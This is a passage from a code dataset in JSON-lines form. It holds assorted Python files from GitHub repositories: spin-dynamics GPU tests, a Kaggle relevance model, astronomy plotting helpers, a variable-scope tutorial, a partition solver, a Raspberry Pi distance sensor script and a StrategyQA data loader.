0.0],\n [0.0, -0.0636, 0.0],\n [0.0, 0.0, 1.0812]])\nA_tensorA[1] = A_tensorA[0]\nA_tensorA[2] = A_tensorA[0]\nA_tensorA[3] = A_tensorA[0]\nA_tensorA[4] = A_tensorA[0]\n\nnB = 5\nmB = np.array([2,2,2,2,2])\nA_tensorB = np.zeros([5,3,3], dtype=float)\nA_tensorB[0] = np.array([[-0.0989, 0.0, 0.0],\n [0.0, -0.0989, 0.0],\n [0.0, 0.0, 1.7569]])\nA_tensorB[1] = A_tensorB[0]\nA_tensorB[2] = A_tensorB[0]\nA_tensorB[3] = A_tensorB[0]\nA_tensorB[4] = A_tensorB[0]\n\n#E-E coupling parameters\nJ = 0.0\nD = -0.4065\nD_epsilon = np.pi/4.0\n\n#External field parameters\nB0 = 50\ntheta = 0.0\nphi = 0.0\n\n#SymmetricUncoupledApprox convergence parameters\nnlow_bins = 4000\nnhigh_bins = 1000\nepsilon = 100\n\n#Rf field parameters\nB1 = 50\ntheta_rf = 0.0\nphi_rf = 0.0\nw_rf = 1.317E7\nphase = 0.0\n\n#Broadband parameters\nwrf_min = 1.0E6\nwrf_max = 1.0E7\nwrf_0 = 1.0E3\n\n#Gamma Compute time steps\nnt = 128\n\n#Number of KMC trajectories\nntrajectories = 1000000\n\n#-----------------------------------------------------------------------------#\n#-----------------------------------------------------------------------------#\n\nclass TestSymmetricUncoupledExactGPU(unittest.TestCase):\n\n global nA, mA, A_tensorA\n global nB, mB, A_tensorB\n global B0, theta, phi\n\n def test_sy_calc(self):\n parameters = spin_dynamics.Parameters(\n calculation_flag=\"static\", kS=1.0E6, kT=1.0E6, \n J=0.0, D=0.0, D_epsilon=0.0, num_threads=12,\n approx_flag=\"exact\", gpu_flag=True)\n hA, hB = spin_dynamics.build_hamiltonians(\n parameters, nA, nB, mA, mB, A_tensorA, A_tensorB)\n hA.transform(B0, theta, phi)\n hB.transform(B0, theta, phi)\n\n output = spin_dynamics.compute_singlet_yield(parameters, hA=hA, hB=hB)\n\n self.assertAlmostEqual(output, 0.388335592180034, 7,\n \"Symmetric Uncoupled Exact GPU failed\")\n \n#-----------------------------------------------------------------------------#\n\nclass TestFloquetUncoupledSingleFrequencyGPU(unittest.TestCase):\n\n global nA, mA, A_tensorA\n global nB, mB, A_tensorB\n global B0, theta, phi\n global B1, theta_rf, phi_rf\n global w_rf, phase\n\n def test_sy_calc(self):\n parameters = spin_dynamics.Parameters(\n calculation_flag='floquet', kS=1.0E3, kT=1.0E3,\n J=0.0, D=0.0, D_epsilon=0.0, num_threads=1,\n epsilon=epsilon, nfrequency_flag='single_frequency',\n gpu_flag=True)\n hA, hB = spin_dynamics.build_hamiltonians(\n parameters, nA, nB, mA, mB, A_tensorA, A_tensorB)\n hA.transform(B0, theta, phi, B1, theta_rf, phi_rf)\n hB.transform(B0, theta, phi, B1, theta_rf, phi_rf)\n\n hA.floquet_matrices(parameters, w_rf, phase)\n hB.floquet_matrices(parameters, w_rf, phase)\n\n output = spin_dynamics.compute_singlet_yield(parameters, hA=hA, hB=hB)\n \n self.assertAlmostEqual(output, 0.38771746823315695, 7,\n \"Floquet Uncoupled Single Frequency failed\")\n \n#-----------------------------------------------------------------------------#\n\nclass TestHeadingAccuracy(unittest.TestCase):\n\n def test_heading_accuracy_calc(self):\n angles, sy_values = spin_dynamics.load_test_data()\n retina_signal = spin_dynamics.RetinaSignal(\n 40, angles=angles, sy_values=sy_values)\n\n heading_accuracy = spin_dynamics.HeadingAccuracy(retina_signal, 1000)\n output = heading_accuracy.lower_bound_error(\n retina_signal, 1.0E6, num_threads=12, gpu_flag=True)\n\n self.assertTrue(output < 0.95 and output > 0.85, \n \"Heading Accuracy GPU calculation failed\")\n\n##-----------------------------------------------------------------------------#\n##-----------------------------------------------------------------------------#\n\nif __name__ == \"__main__\":\n unittest.main()\n\n\n\n\n\n\n\n\n","repo_name":"hghiscock/spin_dynamics","sub_path":"gpu_tests.py","file_name":"gpu_tests.py","file_ext":"py","file_size_in_byte":4469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6459269549","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport pandas as pd\nfrom utility import *\nfrom sklearn.feature_extraction import text\nfrom sklearn.decomposition import TruncatedSVD\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.svm import SVR\nimport cfg\n\n\n\ndef build_model(titles,X1,X3,X4,titles_test,X1_test,X3_test,X4_test,y,weights=None,params=[400,10,0.0],top_words=10):\n '''\n X1: query lenght,title lenght,description presetn flag,number of words from query that also occured in title,\n compression distance between query and title ,1 - edit distance between query and title,\n 1 - average(maximum edit distance between word from query and every word from title),\n last word from query present in title flag,ratio of words from query that also occured in title\n X3: Stanislav's features\n X4: Mikhail's features\n params list: [Number of SVD components, C in SVR, gamma in SVR]\n '''\n #get features from extended queries\n if top_words==10:\n X5 = np.loadtxt(cfg.path_features + 'train_ext_counts_top10.txt')\n X5_test = np.loadtxt(cfg.path_features + 'test_ext_counts_top10.txt')\n queries_ext = np.array(pd.read_csv(cfg.path_features + 'train_ext_top10.csv')['query'])\n queries_ext_test = np.array(pd.read_csv(cfg.path_features + 'test_ext_top10.csv')['query'])\n elif top_words==15:\n X5 = np.loadtxt(cfg.path_features + 'train_ext_counts_top15.txt')\n X5_test = np.loadtxt(cfg.path_features + 'test_ext_counts_top15.txt')\n queries_ext = np.array(pd.read_csv(cfg.path_features + 'train_ext_top15.csv')['query'])\n queries_ext_test = np.array(pd.read_csv(cfg.path_features + 'test_ext_top15.csv')['query'])\n else:\n print('Generate features for extended queries. top10 or top 15.')\n print(1/0)\n \n df_train = pd.DataFrame(np.c_[queries_ext,titles],columns=['query','product_title'])\n df_test = pd.DataFrame(np.c_[queries_ext_test,titles_test],columns=['query','product_title'])\n train_qt = list(df_train.apply(lambda x:'%s %s' % (x['query'],x['product_title']),axis=1))\n test_qt = list(df_test.apply(lambda x:'%s %s' % (x['query'],x['product_title']),axis=1))\n \n \n tfv = text.TfidfVectorizer(min_df=10, max_features=None, \n strip_accents='unicode', analyzer='char',token_pattern=r'\\w{1,}',\n ngram_range=(1, 5), use_idf=1,smooth_idf=1,sublinear_tf=1,\n stop_words = 'english')\n \n tfv.fit(train_qt)\n X2 = tfv.transform(train_qt)\n X2_test = tfv.transform(test_qt)\n svd = TruncatedSVD(n_components=params[0])\n mms = MinMaxScaler()\n \n X = np.c_[svd.fit_transform(X2),X1,X4,X3,X5]\n X_test = np.c_[svd.transform(X2_test),X1_test,X4_test,X3_test,X5_test]\n \n X=mms.fit_transform(X)\n X_test = mms.transform(X_test)\n \n clf = SVR(C=params[1],gamma=params[2],cache_size=2048,kernel='rbf')\n clf.fit(X,y,sample_weight=weights)\n p = clf.predict(X_test)\n return p\n\ntrain = pd.read_csv(cfg.path_train).fillna(\"\")\ntest = pd.read_csv(cfg.path_test ).fillna(\"\")\nidx = test.id.values.astype(int)\ny = train.median_relevance.values\n\nX1, weights, titles = (np.loadtxt(cfg.path_features + 'train_counts.txt'),\n np.array(pd.read_csv(cfg.path_features + 'weights.csv'))[:,0],\n np.array(pd.read_csv(cfg.path_features + 'titles_clean.csv'))[:,0])\nX1_test, titles_test = (np.loadtxt(cfg.path_features + 'test_counts.txt'),\n np.array(pd.read_csv(cfg.path_features + 'titles_test_clean.csv'))[:,0])\n\n\nX4 = np.loadtxt(cfg.path_features + 'X_additional_tr.txt')\nX4_test = np.loadtxt(cfg.path_features + 'X_additional_te.txt')\n\nX3 = np.loadtxt(cfg.path_features + 'ssfeas4train.txt')\nX3_test = np.loadtxt(cfg.path_features + 'ssfeas4test.txt')\n\nnp.random.seed(seed=22)\np1 = build_model(titles,X1,X3,X4,titles_test,X1_test,X3_test,X4_test,y,weights=weights,params=[300,8,0.15],top_words=10)\n\np2 = build_model(titles,X1,X3,X4,titles_test,X1_test,X3_test,X4_test,y,weights=weights,params=[400,4,0.20],top_words=15)\n\nnp.savetxt(cfg.path_features + 'dmitry_model1.txt',p1)\nnp.savetxt(cfg.path_features + 'dmitry_model2.txt',p2)\n","repo_name":"geffy/kaggle-crowdflower","sub_path":"fit_models_dmitry.py","file_name":"fit_models_dmitry.py","file_ext":"py","file_size_in_byte":4195,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"52"} +{"seq_id":"456569605","text":"import time\nimport h5py\nimport os, sys\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy.table import Table\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\nfrom .utils import bin_at_resolution\n\n__all__ = ['stacked_transits', 'transmission_spectrum', 'transit_residuals',\n 'mission_spectra']\n\ndef stacked_transits(time, wavelength, flux, variance, colors,\n centers=np.flip(np.linspace(0.85, 2.55, 15)),\n offset=0.05, offset_delta=0.005, figsize=(8,14),\n text=True, time_ind=230, linestyle=''):\n\n wave_offset = 0.5\n\n x = 0\n\n fig, ax = plt.subplots(figsize=figsize)\n fig.set_facecolor('w')\n rms = np.zeros(len(centers))\n grid = np.zeros((len(centers), len(flux)))\n\n for i, center in enumerate(centers):\n q = np.where((wavelength>=center-wave_offset) &\n (wavelength<=center+wave_offset) &\n (np.nansum(variance,axis=0) < 1e7))[0]\n\n spec = np.nansum(flux[:,q],axis=1)/1e6\n yerr = np.sqrt(np.nansum(variance[:,q]**2,axis=1))/1e6\n\n rms[i] = np.sqrt(np.nansum(spec[:100]**2)/100)\n\n yerr /= np.nanmedian(spec)\n spec /= np.nanmedian(spec)\n\n ax.errorbar(time,\n spec-offset,\n yerr=yerr, linestyle=linestyle, c=colors[x],\n marker='.', label=np.round(center,2))\n grid[i] = spec\n\n if text:\n ax.text(x=time[time_ind], y=np.nanmedian(spec[210:])-offset,\n s='{} $\\mu$m'.format(np.round(center,2)),\n fontsize=16)\n\n offset -= offset_delta\n x+=int(256/len(centers)-1)\n return fig, rms, grid\n\ndef plot_type_scatter(w, d, we, de, ax, kwargs):\n \"\"\" Helper function for scatter-type plots. \"\"\"\n ax.errorbar(w, d, xerr=we, yerr=de, marker='.', **kwargs)\n return\n\ndef plot_type_fill_between(w, d, de, ax, kwargs):\n \"\"\" Helper function for fill_between-type plots. \"\"\"\n kwargs.pop('alpha')\n ax.plot(w, d, alpha=1, **kwargs)\n kwargs['lw'] = 0\n kwargs['label'] = ''\n ax.fill_between(w, d-de, d+de, alpha=0.4, **kwargs)\n return\n\ndef transmission_spectrum(wavelength, depth, wave_err, depth_err,\n plot_type='scatter', ax=None,\n **kwargs):\n \"\"\"\n Plots a given transmission spectrum.\n\n Parameters\n ----------\n wavelength : np.ndarray\n Array of wavelength data.\n depth : np.ndarray\n Array of measured transit depths.\n wave_err : np.ndarray\n Errors or binsize of each wavelength the transit depth was evaluated\n over.\n depth_err : np.ndarray\n Errors on the measured transit depth.\n plot_type : str, optional\n The way to plot the transmission spectrum. Default is 'scatter' (will\n plot each measured depth as an individual point). Other option is\n 'fill_between' (plots a line with shading for the depth error).\n ax : matplotlib.axes._subplots.AxesSubplot, optional\n Subplot to plot the transmission spectrum on. Default is None.\n \"\"\"\n if ax is None:\n fig, ax = plt.subplots(figsize=(14,4))\n\n if plot_type.lower() == 'scatter':\n plot_type_scatter(wavelength, depth, wave_err, depth_err,\n ax, **kwargs)\n\n elif plot_type.lower() == 'fill_between':\n plot_type_fill_between(wavelength, depth, depth_err, ax,\n **kwargs)\n else:\n return('plot_type not implemented. Please select between \"scatter\"\\\n and \"fill_between\".')\n\n return fig\n\n\ndef ers_transmission_spectra(table, order, color, label, ax, alpha=0.4, lw=3,\n upper_lim2=0.85, plot_type='fill_between',\n binned=True, R=100, ms=10):\n \"\"\"\n Plotting all of the beautiful transmission spectra from the ERS program.\n\n Parameters\n ----------\n table : astropy.table.Table\n Table with the wavelength (`wave`), wavelength error (`wave_err`),\n transit depth (`dppm`), transit depth error (`dppm_err`), and order\n (`order`) as columns.\n order : int\n Which NIRISS order to plot. Options are 1 and 2.\n color : str\n Color to plot the transmission spectrum in.\n label : str\n Line label for the plot legend.\n ax : matplotlib.axes._subplots.AxesSubplot\n Subplot to plot the transmission spectrum on.\n alpha : float, optional\n How transparent to make the fill_between shading. Default is 0.4.\n lw : float, optional\n How thick to make the central line. Default is 3.\n upper_lim2 : float, optional\n The longest wavelength to evaluate for Order 2. Default is 0.85.\n plot_type : str, optional\n The way to plot the transmission spectrum. Default is 'fill_between'\n (plots a line with shading for the depth error). Other option is\n 'scatter' (will plot each measured depth as an individual point).\n binned : bool, optional\n Whether or not to bin the transmission spectrum to a given resolution\n before plotting. Default is True.\n R : int, optional\n The resolution to bin the transmission spectrum to. Default is 100.\n Recommended R = 100 for the Order 1 and R = 50 for Order 2.\n \"\"\"\n # Create masks for each order from the table (it's easier to plot the\n # orders separately)\n if order==1:\n q = table['order'] == order\n elif order==2:\n q = (table['order']==order) & (table['wave']<upper_lim2)\n else:\n return('order must equal 1 or 2.')\n\n # Bins the spectrum if binned == True\n if binned:\n out = bin_at_resolution(table['wave'][q], table['dppm'][q],\n table['dppm_err'][q], R=R)\n else:\n out = [table['wave'], table['dppm'], table['dppm_err']]\n\n # Plots the spectrum\n if plot_type == 'fill_between':\n plot_type_fill_between(out[0], out[1], out[2], ax,\n kwargs={'lw':lw, 'alpha':alpha,\n 'zorder':10, 'color':color,\n 'label':label})\n\n elif plot_type == 'scatter':\n plot_type_scatter(out[0], out[1], np.zeros(len(out[1])), out[2],\n ax=ax,\n kwargs={'alpha':1, 'label':label,\n 'zorder':10, 'color':color,\n 'linestyle':'', 'ms':ms})\n else:\n return('plot_type not implemented. Please select between \"scatter\"\\\n and \"fill_between\".')\n\n return\n\ndef transit_residuals(time, flux, flux_err, residuals, residuals_err, color,\n model=None, ax=None, size=\"20%\", pad=0, index1=0,\n index2=0, resid_lims=[-1000,1000], xlim=[-3,3],\n lc_lims=[0.975, 1.001], labelx=False, labelxticks=False,\n xlabel=None, labelyticks=False):\n \"\"\"\n Helper function to create subplot with a transit and the residuals\n underneath.\n\n Parameters\n ----------\n time : np.ndarray\n Array of times.\n flux : np.ndarray\n Array of fluxes.\n flux_err : np.ndarray\n Array of flux errors.\n residuals : np.ndarray\n Array of residuals between the light curve and best-fit model.\n residuals_err : np.ndarray\n Array of errors on the residuals.\n color : str\n What color to plot the data in.\n model : np.ndarray, optional\n Best-fit transit model to overplot. Default is None (i.e. the model\n will not be overplotted).\n ax : matplotlib.axes._subplots.AxesSubplot, optional\n The subplot to plot the data on. Default is None (i.e. will create its\n own figure).\n size : str, optional\n The percent split between the main light curve and the residuals. Default\n is '20%'.\n pad : float, optional\n The amount of padding between the light curve and residuals subpanels.\n Default is 0.\n index1 : int, optional\n If looping through several columns, this will help with setting/removing\n axes labels and ticklabels. Default is 0. Would be \"i\" in the first loop.\n index2 : int, optional\n If looping through several rows, this will help with setting/removing\n axes labels and ticklabels. Default is 0. Would be \"j\" in the second loop.\n \"\"\"\n if ax is None:\n fig, ax = plt.subplots(figsize=(10,6))\n\n divider = make_axes_locatable(ax)\n ax2 = divider.append_axes(\"bottom\", size=size, pad=pad)\n ax.figure.add_axes(ax2)\n\n ax.errorbar(time, flux, yerr=flux_err, marker='.', linestyle='',\n color=color)\n\n if model is not None:\n ax.plot(time, model, 'k', zorder=3)\n\n ax2.errorbar(time, residuals, yerr=residuals_err,\n marker='.', linestyle='', color=color)\n\n #if index1==0:\n if labelxticks == False:\n ax2.set_xticklabels([])\n if labelyticks == False:\n ax.set_yticklabels([])\n\n if index2==0:\n ax2.set_ylabel('Residuals', fontsize=20)\n\n if index2 > 0:\n ax2.set_yticklabels([])\n if index1==1 and index2==0:\n ax2.set_ylabel('Residuals', fontsize=20)\n if labelx:\n ax2.set_xlabel('Time from Mid-Transit [hrs]', fontsize=24)\n\n ax.set_xticks([])\n ax2.set_ylim(resid_lims)\n ax.set_ylim(lc_lims)\n ax.set_xlim(xlim)\n ax2.set_xlim(xlim)\n\n return\n","repo_name":"afeinstein20/nirhiss","sub_path":"src/nirhiss/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":9445,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"30682307980","text":"print('1----------------------------------------------\\n')\nspam = 42 # global variable\n\ndef eggs():\n spam = 42 #local varaible\n\nprint('Some code here:')\nprint('Some more code:')\n\n\nprint('\\n2--------------------------------------------\\n')\ndef spam():\n eggs = 99\n\nspam()\nprint(eggs) # name 'eggs' will not defined #local variable cant use in the global scope\n\nprint('\\n3-------------------------------------------\\n')\n\ndef a():\n eggs = 99\n bacon()\n print(eggs)\n\ndef bacon():\n ham = 101\n eggs = 0 \n\na()# local scope cant use varaible in other local scope\n\nprint('\\n4-------------------------------------------\\n')\n\ndef b():\n print(eggs)\n\neggs = 42\n\nb() # global variable can be use in local scope\n\nprint('\\n5-------------------------------------------\\n')\n\ndef c():\n eggs = 'Hello'\n print(eggs)\n\neggs = 42\nprint(eggs)\n\nc()\n\nprint('\\n6-------------------------------------------\\n')\n\ndef d():\n global eggs # let python know this variable is for global scope\n eggs = 'Hello'\n print(eggs)\n\neggs = 42\nprint(eggs)\n\nd()\n","repo_name":"AlanTeeWeiLoon/Python-Programming-Fundamental-for-Beginner-","sub_path":"Section 3 - Functions/global_local_variable_example.py","file_name":"global_local_variable_example.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33867042107","text":"\"\"\"\nExample usage:\npython3 draw_specific_element.py /media/juliocesar/04968D53968D4660/Millenium/projects/flores/DJI_0289_alto IMG_1\n\"\"\"\n\nimport sys\nimport os\nimport cv2\nimport pandas as pd\n\nclass DrawElement:\n def __init__(self, root_path, id_):\n self.images_src = os.path.join(root_path, 'Images')\n self.csv_path = os.path.join(root_path, 'data.csv')\n self.id = id_ + '.jpg'\n self.run()\n\n def run(self):\n df = pd.read_csv(self.csv_path, index_col='Filename')\n id_info = df.loc[self.id]\n org_img = id_info['Original']\n xmin, xmax = id_info['xmin'], id_info['xmax']\n ymin, ymax = id_info['ymin'], id_info['ymax']\n img = cv2.imread(os.path.join(self.images_src, org_img))\n cv2.rectangle(img, (xmin, ymin), (xmax, ymax), (0, 255, 0), 10)\n window_name = '{} - {}'.format(self.id, id_info['Class'])\n cv2.namedWindow(window_name, cv2.WINDOW_NORMAL)\n cv2.imshow(window_name, img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\nif __name__ == \"__main__\":\n DrawElement(sys.argv[1], sys.argv[2])","repo_name":"jcgarciaca/annotations_analysis","sub_path":"draw_specific_element.py","file_name":"draw_specific_element.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1817550807","text":"from sys import stdin\n\n## DP approach\n\n## ToDO\n\ndef isSubsetSumDP(arr, n, s1, s2):\n\n matrix = [[[True for z in range(n+1)] for y in range(s1+1)] for x in range(s2+1)]\n\n for i in range(s1+1):\n for j in range(s2+1):\n for k in range(n+1):\n if j == 0:\n matrix[i][j][k] = True\n elif (j != 0 and k == 0):\n matrix[i][j][k] = False\n else:\n matrix[i][j][k] = matrix[i][j-1]\n\n return matrix\n\n\n\n\n# A recursive Python3 program for partition problem\n\n# A utility function that returns\n# true if there is a subset of\n# arr[] with sun equal to given sum\ndef isSubsetSum(arr, n, s1, s2, memoize_arr):\n #print(memoize_arr)\n # Base Cases\n if (s1 == 0 and s2 == 0) :\n return True\n if n == 0 and (s1 != 0 or s2 != 0):\n return False\n\n \"\"\" The memoize array stores the value and will be used again instead of computing multiple times\n The condition >= 0 is to ignore the indices which can be negative\n \"\"\"\n if (s1 >= 0 and s2 >= 0):\n\n if (memoize_arr[n-1][s1-1][s2-1] != -1):\n return memoize_arr[n-1][s1-1][s2-1]\n\n # print(\"----Index = \", n)\n # print(\"part_1 =\", arr, n - 1, s1, s2)\n # print(\"part_2 =\", arr, n - 1, s1 - arr[n - 1], s2)\n # print(\"part_3 =\", arr, n - 1, s1, s2 - arr[n - 1])\n\n ''' else, check if sum can be obtained by any of \n the following \n So for three parts each number has three options: either you pick it and put into the first part,\n pick it and put into the second part or you don't pick it and it goes into the first part.\n '''\n if (s1 >= 0 and s2 >= 0):\n memoize_arr[n-1][s1-1][s2-1] = (isSubsetSum(arr, n-1, s1, s2,memoize_arr) or\n isSubsetSum(arr, n-1, s1-arr[n-1],s2,memoize_arr) or\n isSubsetSum(arr,n-1,s1,s2-arr[n-1],memoize_arr))\n return memoize_arr[n-1][s1-1][s2-1]\n else:\n return (isSubsetSum(arr, n-1, s1, s2,memoize_arr) or\n isSubsetSum(arr, n-1, s1-arr[n-1],s2,memoize_arr) or\n isSubsetSum(arr,n-1,s1,s2-arr[n-1],memoize_arr))\n\n\n# Returns true if arr[] can be partitioned in three\n# subsets of equal sum, otherwise false\ndef findPartion(arr):\n # Calculate sum of the elements in array\n n = len(arr)\n part_sum = sum(arr)//3\n memoize_arr = [[[-1 for z in range(part_sum + 1)] for y in range(part_sum + 1)] for x in range(n + 1)]\n # If sum is not divisible by 3 or the maximum element in the array is greater than the part_sum or the length is less than 3\n if sum(arr) % 3 != 0 or max(arr) > part_sum or len(arr) < 3:\n return False\n\n part_sum1 = part_sum\n part_sum2 = part_sum\n return isSubsetSum(arr, n, part_sum1, part_sum2,memoize_arr)\n\n\n#print(findPartion([7,7,7]))\n\n#Driver program to test above function\n# for values, answer in (\n# ((20,), 0),\n# ((7, 7, 7), 1),\n# ((3, 3, 3), 1),\n# ((3, 3, 3, 3), 0),\n# ((3,1,1,2,2),1),\n#\n# ):\n# print(findPartion(values), answer)\n\n\n\n\nif __name__ == '__main__':\n input_n, *input_values = list(map(int, stdin.read().split()))\n assert input_n == len(input_values)\n result = findPartion(input_values)\n if result:\n print('1')\n else:\n print('0')\n","repo_name":"patell11/DataStructuresAndAlgorithms_SanDiego","sub_path":"Algorithmic Toolbox1/Dynamic Programming/Partitioning Souvenirs/partition.py","file_name":"partition.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"74304825445","text":"# import RPi.GPIO as GPIO\n# from EmulatorGUI import GPIO\nimport SimulRPi.GPIO as GPIO\nimport time\n\n# Set up GPIO pins\nTRIG = 16 # GPIO pin for ultrasonic sensor trigger\nECHO = 17 # GPIO pin for ultrasonic sensor echo\nMOTOR_PIN = 12 # GPIO pin for vibrating motor\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(TRIG, GPIO.OUT)\nGPIO.setup(ECHO, GPIO.IN)\nGPIO.setup(MOTOR_PIN, GPIO.OUT)\n\n# Initialize variables\nwindow_size = 5 # Moving average window size\ndistances = [0] * window_size # Circular buffer for distances\nindex = 0 # Index of the current distance in the circular buffer\n\n# Helper function to compute moving average\ndef moving_average(distances):\n return sum(distances) / len(distances)\n\n# Helper function to alert user with motor\ndef alert_user():\n GPIO.output(MOTOR_PIN, GPIO.HIGH)\n time.sleep(0.5)\n GPIO.output(MOTOR_PIN, GPIO.LOW)\n\n# Wait for sensor to settle\nGPIO.output(TRIG, False)\nprint(\"Waiting for sensor to settle...\")\ntime.sleep(2)\n\ndef depth_estimation():\n while True:\n # Trigger ultrasonic sensor\n GPIO.output(TRIG, True)\n time.sleep(0.00001)\n GPIO.output(TRIG, False)\n \n # Measure pulse duration\n while GPIO.input(ECHO) == 0:\n pulse_start = time.time()\n \n while GPIO.input(ECHO) == 1:\n pulse_end = time.time()\n \n pulse_duration = pulse_end - pulse_start\n \n # Convert pulse duration to distance\n distance = pulse_duration * 17150\n \n # Update circular buffer\n distances[index] = distance\n index = (index + 1) % window_size\n \n # Compute moving average of distances\n moving_avg = moving_average(distances)\n \n # Check for sudden change in depth\n if abs(distance - moving_avg) > 10:\n print(\"Sudden change detected!\")\n alert_user()\n \n # Print distance\n print(\"Distance:\", round(distance, 2), \"cm\")\n \n # Wait before next measurement\n time.sleep(0.1)\n\nif __name__ == \"__main__\":\n try:\n depth_estimation()\n except KeyboardInterrupt:\n GPIO.cleanup()\n print(\"Program depth stopped by user. GPIO cleanup completed.\")\n\n\"\"\"\n In this code, we use a circular buffer to store the last window_size distance measurements and compute the moving average of those measurements. We then check for a sudden change in depth by comparing the current distance to the moving average, and if the difference is greater than a threshold (in this case, 10 cm), we alert the user with the vibrating motor. The alert_user function simply turns on the motor for half a second before turning it off again.\n\nNote that this is just an example code and you may need to adjust the moving average window size and threshold to fit your specific requirements. Also, make sure to properly connect and configure the vibrating motor to the GPIO pin before running the code.\n\"\"\"","repo_name":"Sudhansh6/Navicane","sub_path":"Code/depth.py","file_name":"depth.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15185729257","text":"class Solution:\n def sumOfDigits(self, A):\n #this method will return the sum of the digits of a number\n if A == 0:\n return 0\n else:\n return (A % 10) + self.sumOfDigits(A//10)\n \n # @param A : integer\n # @return an integer\n def solve(self, A):\n #we will return True(1) if the recursive sum of the digits is 1, else return False(0)\n #Here we will make use of the sumOfDigits method\n if A == 1:\n return 1\n else:\n n = self.sumOfDigits(A)\n while n > 9:\n n = self.sumOfDigits(n)\n if n == 1:\n return 1\n else:\n return 0\n\n#test\ns = Solution()\nans = s.solve(83557)\nassert ans == 1\n\nans = s.solve(1291)\nassert ans == 0","repo_name":"jaikishanEngg/Advanced-DSA-ScalerAcademy","sub_path":"Recursion/Q2_IsMagic.py","file_name":"Q2_IsMagic.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"33572922889","text":"import os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\n\nimport tensorflow as tf\nimport numpy as np\nimport random\nimport json\nimport copy\n\nfrom transformers import BertTokenizer\n\nclass StrategyQALoader:\n '''\n\n '''\n def __init__(self, filepath, tokenizer, is_test=False, shuffle=False, max_seq_len=512, mode:str=\"sigmoid\", is_token_type_ids: bool=True):\n\n self.filepath = filepath\n self.tokenizer = tokenizer\n self.is_test = is_test\n self.shuffle = shuffle\n self.max_seq_len = max_seq_len\n self.is_token_type_ids = is_token_type_ids\n self.mode = mode\n assert mode.lower() != \"softmax\", f\"The softmax function has not been implemented.\"\n\n self.data = None\n self.facts = []\n self.question = []\n self.idx = [] # each id will be a string, e.g., 3d0f8824ea83ddcc9ab03055658b89d3\n self.label = []\n\n self.data = []\n with open(filepath, \"r\") as f:\n self.data = json.load(f)\n\n for example in self.data:\n self.facts.append(\" \".join(example[\"facts\"]))\n self.question.append(example[\"question\"])\n self.idx.append(example[\"qid\"])\n self.label.append(example[\"answer\"])\n\n assert len(self.facts) == len(self.question)\n assert len(self.facts) == len(self.idx)\n assert len(self.facts) == len(self.label)\n\n self.processed_data = list(zip(self.idx, self.question, self.facts, self.label))\n assert len(self.facts) == len(self.processed_data)\n print(f\"len(processed_data): {len(self.processed_data)}\")\n\n def _shuffle(self):\n random.shuffle(self.processed_data)\n\n def _label_to_int(self, label: str, choice: str):\n if label == choice: return 1\n else: return 0\n\n def __call__(self, batch_size):\n if self.shuffle: self._shuffle()\n #[label, idx, stem, choice, text]\n\n batch_counter = 0\n batch_input = [] # [[senta, sentb], [senta, sentb]]\n idx_list = []\n labels = []\n for i, example in enumerate(self.processed_data):\n # example: [0] is idx, [1] is question, [2] is facts, and [3] is label/answer\n sentence_a, sentence_b = example[2], example[1]\n\n batch_input.append([sentence_a, sentence_b])\n idx_list.append(example[0]) # each item in the list will be a list of two numbers. [exidx, qidx]\n batch_counter += 1\n if not self.is_test:\n assert isinstance(example[3], bool)\n labels.append([1 if example[3] is True else 0])\n if batch_counter % batch_size == 0:\n tok_str_ = self.tokenizer.batch_encode_plus(batch_input,\n add_special_tokens=True, padding=\"max_length\",\n max_length=self.max_seq_len, truncation=\"only_first\")\n # truncation=True)\n batch_counter = 0\n batch_input = []\n\n tok_str_[\"input_ids\"] = tf.cast(tf.convert_to_tensor(tok_str_[\"input_ids\"]), dtype=tf.dtypes.int32)\n tok_str_[\"attention_mask\"] = tf.cast(tf.convert_to_tensor(tok_str_[\"attention_mask\"]),\n dtype=tf.dtypes.int32)\n if self.is_token_type_ids:\n tok_str_[\"token_type_ids\"] = tf.cast(tf.convert_to_tensor(tok_str_[\"token_type_ids\"]),\n dtype=tf.dtypes.int32)\n\n idx_list_ = tf.convert_to_tensor(idx_list, dtype=tf.dtypes.string)\n idx_list = []\n\n if not self.is_test:\n labels_ = labels # store the values of the labels before resetting in the next line.\n labels = []\n labels_ = tf.cast(tf.convert_to_tensor(labels_), dtype=tf.dtypes.int8)\n\n if self.is_test:\n yield idx_list_, tok_str_\n else:\n yield idx_list_, tok_str_, labels_\n\n # if there are still samples in batch_input then output them as follows; i.e., in a smaller batch size.\n if len(batch_input) != 0:\n tok_str_ = self.tokenizer.batch_encode_plus(batch_input,\n add_special_tokens=True, padding=\"max_length\",\n max_length=self.max_seq_len, truncation=\"only_first\")\n # truncation=True)\n\n batch_input = [] # technically not needed here.\n\n tok_str_[\"input_ids\"] = tf.cast(tf.convert_to_tensor(tok_str_[\"input_ids\"]), dtype=tf.dtypes.int32)\n tok_str_[\"attention_mask\"] = tf.cast(tf.convert_to_tensor(tok_str_[\"attention_mask\"]),\n dtype=tf.dtypes.int32)\n if self.is_token_type_ids:\n tok_str_[\"token_type_ids\"] = 